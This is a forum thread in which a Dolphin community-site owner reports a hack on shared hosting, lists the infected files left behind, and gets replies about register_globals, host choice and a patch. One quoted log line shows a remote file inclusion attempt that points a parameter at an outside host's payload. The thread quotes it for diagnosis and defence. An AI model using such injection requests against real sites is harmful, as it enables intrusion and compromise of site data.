To my surprise,One fine morning I saw my dolphin site (v 6.1.2) (which was hosted on ixweb shared hosting) hacked. All the files in /inc directory and all the profile images/music files/video files were removed.I did not take back up of my site for the past few days so I lost few members and pictures/videos/music of existing members.
Did anybody experience the same ??
When I look at the analytics I observed few visits from Nigeria/lagos on the same day and on virus scanning my dolphin site files after downloading I saw few files which were infected with virus. I found them in cache and langs folder and the files were named as
hp.php,msconfig.php,mode.php,hp.php,botnet.pl
I had to reinstall the whole site with the latest source (v6.1.4). Unfotunately I could not find the ip addresses of the nigerian visitors even from webalizer.
My question is with the security patch that was released recently would I be free from this type of hacks ??
I found a site @ http://www.wizcrafts.net/nigerian-blocklist.html and altered the .htaccess file in the root to block the traffic from nigeria.
Is there anything I could do to avoid this kind of attacks ?? any suggestions ?
shared hosts, setup their servers to accomidate for the masses, and leave huge security holes in them.
Even tho we have "dedicated" servers for our domain there, the database is on a "shared" server.
So, far I have not been hacked. (Crossed fingers) But I added the php.ini file suggested by many to alter the register globals that ixwebhosting has ON. (Should be OFF for security)
so you must be on shared hosting, if you have to use a database other than localhost.
godaddy have the same setup with their shared hosting, they have you use a database on another server,
i believe you are mixing a dedicated ip with a dedicated server, they do not have any VPS or dedicated servers on offer for hosting.
Chat InformationPlease wait for a site operator to respond.
Chat InformationYou are now chatting with 'Alex Golovko'
Alex Golovko: Hello, my name is Alex, please let me know how can I help you today?
you: hi, i was looking at your site and i do not see any dedcated servers or VPS
you: do you not offer either?
you: see more
We offer hosting on both Linux and Windows platforms. Our servers run ANY application you like!
hackers can run any application they like
love it
you missed that part, to run any app you need to have register globals on.
they are telling you that anyone can run anything on their shared servers,
they do not have any other servers, all are shared, all are setup to run any app you want,.
thats register globals on all their servers.
they blame the hacking see more
I would certainly go for a dedicated server once the site becomes bit busy. I would atleast go for a VPS for now but I am still not convinced that I would be safe either.I have chosen IX after knowing that it was one of the best sites and I host several of my other websites over there now.I think I will have to change the host now.
I looked at the log files and found these
189.112.40.11 - - [24/Jul/2008:21:36:06 -0500] "GET //?sIncPath=http://h1.ripway.com/jovem1/jovemNOR.txt? see more
such injections will impossible
xxx.php?sIncPath=unwanted_code_path
2. since 6.1.4 we always re-setup all variables before using, so in even don`t will get incoming params
3. we don`t use global $dir more in not-safe places